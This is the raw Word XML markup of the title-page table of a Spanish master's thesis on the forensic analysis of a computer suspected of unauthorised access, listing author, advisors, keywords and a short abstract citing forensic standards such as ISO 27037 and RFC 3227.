            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66C4F9E4" w14:textId="77777777" w:rsidR="00B144D2" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Título del trabajo:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DB37CF7" w14:textId="5BB36BCE" w:rsidR="00B144D2" w:rsidRPr="00F149F6" w:rsidRDefault="004A0AA2" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Análisis forense de un ordenador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="5C53748A" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A418653" w14:textId="77777777" w:rsidR="00B144D2" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="001D77E3">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nombre del autor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ECAFCDC" w14:textId="05B69486" w:rsidR="00B144D2" w:rsidRPr="00F149F6" w:rsidRDefault="004A0AA2" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>José Enrique Rodríguez González.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="1B66A60D" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08AAAC33" w14:textId="77777777" w:rsidR="00B144D2" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="009F1268">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nombre del consultor/a:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="169CE0BE" w14:textId="5C8D1848" w:rsidR="00B144D2" w:rsidRPr="00F149F6" w:rsidRDefault="004A0AA2" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Dña. Elena Botana de Castro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="2F18CF3F" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BFD1012" w14:textId="77777777" w:rsidR="001D77E3" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="001D77E3">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nombre del PRA:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="465E6A17" w14:textId="0DBE206F" w:rsidR="001D77E3" w:rsidRPr="00F149F6" w:rsidRDefault="004A0AA2" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>D. Jordi Serra Ruiz.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="1C22B56B" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65D36406" w14:textId="146116D9" w:rsidR="00B144D2" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Fecha de entrega:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79B12699" w14:textId="327A571A" w:rsidR="00B144D2" w:rsidRPr="00F149F6" w:rsidRDefault="004A0AA2" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>01/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="7C712138" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A968AD5" w14:textId="77777777" w:rsidR="00CE1C05" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Titulación o programa:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C58F9B9" w14:textId="0625B5E8" w:rsidR="00CE1C05" w:rsidRPr="00F149F6" w:rsidRDefault="004A0AA2" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1" w:name="_Hlk155721947"/>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Master Universitario de Ciberseguridad y privacidad.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="1"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="070251BB" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B145AA8" w14:textId="77777777" w:rsidR="00CE1C05" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Área del Trabajo Final:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76E69580" w14:textId="7E2DAF54" w:rsidR="00CE1C05" w:rsidRPr="00F149F6" w:rsidRDefault="00422BCC" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Análisis forense.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="1E72B386" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F061AB8" w14:textId="77777777" w:rsidR="00CE1C05" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Idioma del trabajo:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="283BEFFE" w14:textId="485164FE" w:rsidR="00CE1C05" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Castellano</w:t>
            </w:r>
            <w:r w:rsidR="00422BCC" w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="26E87B37" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="315DE3C3" w14:textId="77777777" w:rsidR="00CE1C05" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Palabras clave</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4827" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79F77FA3" w14:textId="341EE19C" w:rsidR="00CE1C05" w:rsidRPr="00C04AFA" w:rsidRDefault="00C04AFA" w:rsidP="00CE1C05">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:i/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C04AFA">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Volatility, Autopsy,</w:t>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>"</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="00C04AFA">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Apache</w:t>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>"</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="040AE0D5" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8459" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FCBAF24" w14:textId="77777777" w:rsidR="007536BF" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Resumen del Trabajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="6D5F2DA0" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8459" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A6C14DC" w14:textId="361726E9" w:rsidR="00422BCC" w:rsidRPr="00F149F6" w:rsidRDefault="00422BCC" w:rsidP="00422BCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">El objetivo del presente Trabajo de Fin de Máster es realizar un análisis forense de un ordenador del que se sospecha de que han accedido a los sistemas de forma ilícita. Se comprobará si realmente han accedido, así como el método que han utilizado. Por otro lado, se elaborará un informe con las consecuencias que se derivan del dicho acceso </w:t>
            </w:r>
            <w:r w:rsidR="00490E1A" w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>además</w:t>
            </w:r>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> se comprobará si ha habido extracción de información alguna. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="305FFC4F" w14:textId="1169B433" w:rsidR="005D2242" w:rsidRPr="00F149F6" w:rsidRDefault="00422BCC" w:rsidP="00422BCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Por último, y no menos importante, para el presente trabajo se tendrán en cuenta los estándares que existen en la actualidad, como pueden ser la norma ISO</w:t>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales.</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F149F6">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 27037, la RFC</w:t>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>RFC (Request for Comments): Documentos que describen métodos, comportamientos, investigaciones o innovaciones aplicables a la operación de Internet y sistemas conectados.</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F149F6">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3227 o las normas de la Asociación Española de Normalización UNE 71505 y UNE 71506.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="2986A70F" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8459" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7766458A" w14:textId="77777777" w:rsidR="007536BF" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00F96BEB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Abstract</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="49F220B1" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8459" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
